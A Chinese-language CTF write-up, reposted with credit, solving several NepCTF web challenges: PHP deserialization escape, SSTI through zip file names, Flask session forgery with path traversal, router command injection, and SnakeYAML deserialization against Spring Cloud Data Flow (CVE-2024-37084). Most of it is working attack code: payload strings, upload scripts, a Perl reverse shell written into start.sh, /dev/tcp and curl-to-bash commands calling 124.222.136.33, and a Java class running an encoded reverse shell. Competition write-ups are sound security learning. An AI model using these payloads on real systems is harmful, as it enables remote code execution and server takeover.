PHP_MASTER!!
PHP
反序列化键值逃逸+
mb_strpos
与
mb_substr
连用导致的字符注入
https://www.cnblogs.com/EddieMurphy-blogs/p/18310518
flag在phpinfo里
payload:
?c=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00";s:3:"str";O:1:"B":1:{s:1:"b";s:7:"phpinfo";}}&nep1=%f0123%f0123%f0123%9f%9f%f0123&nep=Nep
NepDouble
在文件名处打SSTI
convert.py
def escape_string(s):
# 定义要转义的字符
replacements = {
'{': r'\{',
'}': r'\}',
'[': r'\[',
']': r'\]',
'(': r'\(',
')': r'\)',
"'": r"\'",
'"': r'\"',
}
# 替换字符串中的特殊字符
for char, replacement in replacements.items():
s = s.replace(char, replacement)
return s
# 原始字符串
original_string = """{{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('\\\\143'+'\\\\141'+'\\\\164'+'\\\\40'+'\\\\57'+'\\\\146'+'\\\\52').read()")}}"""
# 转义字符串
escaped_string = escape_string(original_string)
print(escaped_string)
生成恶意文件名的文件
vim \{\{x.__init__.__globals__\[\'__builtins__\'\]\[\'eval\'\]\(\"__import__\(\'os\'\).popen\(\'\\143\'+\'\\141\'+\'\\164\'+\'\\40\'+\'\\57\'+\'\\146\'+\'\\52\'\).read\(\)\"\)\}\}
压缩成zip
zip 1.zip \{\{x.__init__.__globals__\[\'__builtins__\'\]\[\'eval\'\]\(\"__import__\(\'os\'\).popen\(\'\\143\'+\'\\141\'+\'\\164\'+\'\\40\'+\'\\57\'+\'\\146\'+\'\\52\'\).read\(\)\"\)\}\}
upload.py上传
import requests
# 定义服务器的URL
url = "https://neptune-32978.nepctf.lemonprefect.cn/" # 替换为你的 Flask 服务器地址
# 定义要上传的文件路径
file_path = "1.zip" # 替换为你要上传的 ZIP 文件路径
# 打开文件,以便于上传
with open(file_path, 'rb') as file:
# 构建请求的文件部分
files = {'tp_file': file}
# 发送 POST 请求,上传文件
response = requests.post(url, files=files)
# 输出服务器响应
print("Status Code:", response.status_code)
print("Response Text:", response.text)
蹦蹦炸弹(boom_it)
先是flask的session伪造
再路径穿越上传lock.txt
之后便能低权限rce
start.sh有权限更改
echo '#!/bin/bash' > start.sh
echo "perl -e 'use Socket;\$i=\"124.222.136.33\";\$p=1338;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" >> start.sh
数据占用打崩,让服务重启反弹shell
nc 127.0.0.1 8888 < /etc/passwd
root权限读flag
NepRouter-白给
第一个注册流程,无论给什么图片都是TEST
找到拿字符串的html位置,手改成自己的 id,然后注册
这里要求存在一个用户NepNepIStheBestTeam,在前面就注册这个用户就能登录8080端口
setRouter处可以命令注入
参数不能带空格,用${IFS}
vps 1338起个恶意服务
bash -i >& /dev/tcp/124.222.136.33/1337 0>&1
反弹shell
/setrouter?ip_address=127.0.0.1;curl${IFS}http://124.222.136.33:1338/evil.html|bash
Always RCE First
对着CVE-2024-37084复现
奇安信攻防社区-Spring Cloud Data Flow 漏洞分析(CVE-2024-22263|CVE-2024-37084)
GitHub - artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads
package.yaml
apiVersion: 1.0.0
origin: my origin
repositoryId: 12345
repositoryName: local
kind: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://124.222.136.33:1338/yaml-payload.jar"]]]]
name: test
version: 1.0.0
AwesomeScriptEngineFactory.java
package artsploit;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;
public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
public AwesomeScriptEngineFactory() {
try {
Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}");
} catch (IOException e) {
e.printStackTrace();
}
}
@Override
public String getEngineName() {
return null;
}
@Override
public String getEngineVersion() {
return null;
}
@Override
public List<String> getExtensions() {
return null;
}
@Override
public List<String> getMimeTypes() {
return null;
}
@Override
public List<String> getNames() {
return null;
}
@Override
public String getLanguageName() {
return null;
}
@Override
public String getLanguageVersion() {
return null;
}
@Override
public Object getParameter(String key) {
return null;
}
@Override
public String getMethodCallSyntax(String obj, String m, String... args) {
return null;
}
@Override
public String getOutputStatement(String toDisplay) {
return null;
}
@Override
public String getProgram(String... statements) {
return null;
}
@Override
public ScriptEngine getScriptEngine() {
return null;
}
}
zip包转字节列表脚本
def zip_to_byte_list(zip_file_path):
# 打开并读取 ZIP 文件的二进制数据
with open(zip_file_path, 'rb') as file:
byte_content = file.read()
# 将二进制数据转换为字节列表
byte_list = list(byte_content)
return byte_list
# 使用示例
zip_file_path = 'test-1.1.1.zip' # 替换为你的ZIP文件路径
byte_list = zip_to_byte_list(zip_file_path)
print(byte_list) # 输出字节列表
/api/package/upload传payload:
{"repoName":"local","name":"test","version":"1.1.1","extension":"zip","packageFileAsBytes":[x,x,x,x]}
反弹shell拿flag
版权归原作者 Z3r4y 所有, 如有侵权,请联系我们删除。